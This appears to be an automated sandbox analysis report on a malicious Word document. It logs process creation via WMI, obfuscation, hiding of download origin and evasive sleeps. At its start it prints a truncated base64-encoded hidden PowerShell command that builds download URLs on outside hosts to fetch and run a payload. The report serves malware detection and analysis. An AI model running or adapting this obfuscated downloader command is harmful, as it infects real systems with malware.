Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAHMAZQBUAC0AVgBhAHIASQBhAGIAbABlACAAIAAoACcARwAnACsAJwBIAHAAJwApACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADUAfQB7ADQAfQB7ADYAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAWQAnACwAJwBUAE8AUgAnACwAJwBZACcALAAnAFMAJwAsACcASQByACcALAAnAHMAdABlAG0ALgBJAG8ALgBkACcALAAnAEUAQwAnACkAIAAgACkAIAAgADsAIAAgACAAJABYAG8AMwA3AHQAIAAgAD0AIAAgAFsAVABZAHAARQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQB7ADQAfQAiAC0AZgAnAE4AdABNAEEAbgBhAEcAZQAnACwAJwBtAC4AbgBFAHQALgBTAEUAUgBWAEkAQwBlAFAAbwBpACcALAAnAHMAWQBzAFQAJwAsACcAZQAnACwAJwBSACcAKQA7ACAAJABNAHAAZAB5AHIAXwAxAD0AJABOADUAXwBHACAAKwAgAFsAYwBoAGEAcgBdACgAMwAzACkAIAArACAAJABIADkAMgBLADsAJABHADgANQBWAD0AKAAnAFAAJwArACgAJwA1ACcAKwAnADcAQgAnACkAKQA7ACAAIAAoACAAIABpAFQAZQBNACAAKAAnAFYAQQAnACsAJwBSAGkAYQBiAEwAJwArACcAZQA6AEcASABQACcAKQApAC4AdgBBAGwAdQBlADoAOgAiAEMAUgBFAGAAQQB0AGAARQBEAGAAaQByAEUAQwB0AE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0ATwAzAHAAcAAxAGIAJwArACcANQB7ACcAKwAnADAAfQAnACsAKAAnAFkAOAA0AHYAaABkACcAKwAnAGgAJwApACsAJwB7ADAAfQAnACkAIAAgAC0ARgAgAFsAQwBIAGEAcgBdADkAMgApACkAOwAkAEMANAA2AFIAPQAoACcAQgA0ACcAKwAnADEASwAnACkAOwAgACgAIABkAGkAcgAgACAAdgBhAFIASQBhAEIAbABFADoAWABPADMANwB0ACAAIAApAC4AVgBhAGwAVQBlADoAOgAiAFMAZQBDAFUAcgBJAHQAYAB5AFAAcgBvAHQAbwBgAEMAYABvAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAxACcAKQArACcAMgAnACkAOwAkAEkANQAzAEgAPQAoACgAJwBDADEAJwArACcANQAnACkAKwAnAEUAJwApADsAJABQAGYAXwB3AHkAcwAzACAAPQAgACgAKAAnAEEAJwArACcANAAxACcAKQArACcATwAnACkAOwAkAEUANAAyAFQAPQAoACgAJwBEADcAJwArACcAMQAnACkAKwAnAEgAJwApADsAJABJADMAegAyAGMAcwByAD0AJABIAE8ATQBFACsAKAAoACgAJwBGAFoAbwBPACcAKwAnADMAJwArACcAcABwADEAJwApACsAKAAnAGIANQBGAFoAJwArACcAbwBZADgAJwArACcANAB2AGgAJwApACsAJwBkACcAKwAnAGgAJwArACgAJwBGAFoAJwArACcAbwAnACkAKQAuACIAcgBFAFAAYABMAGAAQQBDAEUAIgAoACgAJwBGACcAKwAnAFoAbwAnACkALABbAFMAVABSAGkAbgBHAF0AWwBjAGgAQQByAF0AOQAyACkAKQArACQAUABmAF8AdwB5AHMAMwArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQARQAwADQARQA9ACgAKAAnAFoAJwArACcAOQA5ACcAKQArACcAUQAnACkAOwAkAFMAOAA0AGgAOQBoAG4APQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABGAG8AdQBvADEAaAAxAD0AKAAoACcAeAAgACcAKwAnAFsAJwArACcAIABzAGgAIABiACcAKwAnADoALwAvAHUAJwApACsAKAAnAGEAZwAnACsAJwByACcAKQArACcAaQB0ACcAKwAnAGUAYwAnACsAJwBoACcAKwAoACcALgAnACsAJwBjAG8AJwApACsAKAAnAG0AJwArACcALwBjACcAKwAnAGcAaQAtAGIAJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAGEANQBHACcAKwAnAC8AIQB4ACcAKQArACcAIABbACcAKwAoACcAIAAnACsAJwBzAGgAJwArACcAIAAnACsAJwBiADoALwAvACcAKwAnAHcAdwB3AC4AOQAxAHkAJwApACsAKAAnAHUAZABhACcAKwAnAG8AJwArACcALgBjAG8AJwApACsAKAAnAG0ALwB3AHAAJwArACcALQAnACsAJwBhAGQAJwApACsAKAAnAG0AaQBuAC8AJwArACcASwBLAEgAJwArACcAdAAnACkAKwAoACcAMQAvACEAeAAgAFsAJwArACcAIAAnACsAJwBzAGgAIABiACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwB5AG8AJwArACcAdQByAGMAJwApACsAKAAnAGwAZQBhAG4AZQByAHMAdQByACcAKwAnAGYAYQAnACsAJwBjAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwBmAG8AJwArACcAdQByAC0AJwApACsAKAAnAG0AJwArACcAbwBuACcAKwAnAGsAcwAtAGEAYwBhAHMAegAvAE8AJwApACsAJwAyAG0AJwArACcAeQAnACsAKAAnAC8AIQB4ACAAJwArACcAWwAnAC			Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 24_2_10004560 LoadLibraryA,GetProcAddress,AddFontResourceW,

24_2_10004560

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001508D0 push edx; ret	7_2_001509D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001339A0 push cs; ret	7_2_001339A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00132A01 push esi; ret	7_2_00132A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00135BD8 push ss; iretd	7_2_00135C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00135C29 push ss; iretd	7_2_00135C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0013548F push ebp; retf	7_2_00135496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00132CFB push ecx; retn 001Eh	7_2_00132D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00131740 push DA0FDC41h; iretd	7_2_00131745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001908D0 push edx; ret	8_2_001909D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_001739A0 push cs; ret	8_2_001739A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00172A01 push esi; ret	8_2_00172A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00175BD8 push ss; iretd	8_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00175C29 push ss; iretd	8_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_0017548F push ebp; retf	8_2_00175496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00172CFB push ecx; retn 001Eh	8_2_00172D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_00171740 push DA0FDC41h; iretd	8_2_00171745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001E08D0 push edx; ret	9_2_001E09D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C39A0 push cs; ret	9_2_001C39A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C2A01 push esi; ret	9_2_001C2A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C5BD8 push ss; iretd	9_2_001C5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C5C29 push ss; iretd	9_2_001C5C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C548F push ebp; retf	9_2_001C5496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C2CFB push ecx; retn 001Eh	9_2_001C2D01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001C1740 push DA0FDC41h; iretd	9_2_001C1745
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001908D0 push edx; ret	10_2_001909D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001739A0 push cs; ret	10_2_001739A1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00172A01 push esi; ret	10_2_00172A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00175BD8 push ss; iretd	10_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00175C29 push ss; iretd	10_2_00175C3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_0017548F push ebp; retf	10_2_00175496
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_00172CFB push ecx; retn 001Eh	10_2_00172D01

Persistence and Installation Behavior:

Creates processes via WMI

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eeyfocnhd\rdcslqee.tfa:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ildimivpppjhtpz\eazqsushdwhbfu.ifu:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Fmdnydfawb\oqvjuvcbq.olk:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qwyewmqcy\rawdlpqy.lat:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Cryxkxijzq\qqczujwsu.vhn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qaatclqucsvpjzyl\gfpifopxbsfonqs.zax:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bpckjlpwgpssel\qweijehrgslfr.bwc:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Usmneuxccxh\yvkvjeybon.rgv:Zone.Identifier read attributes \| delete

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2588

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
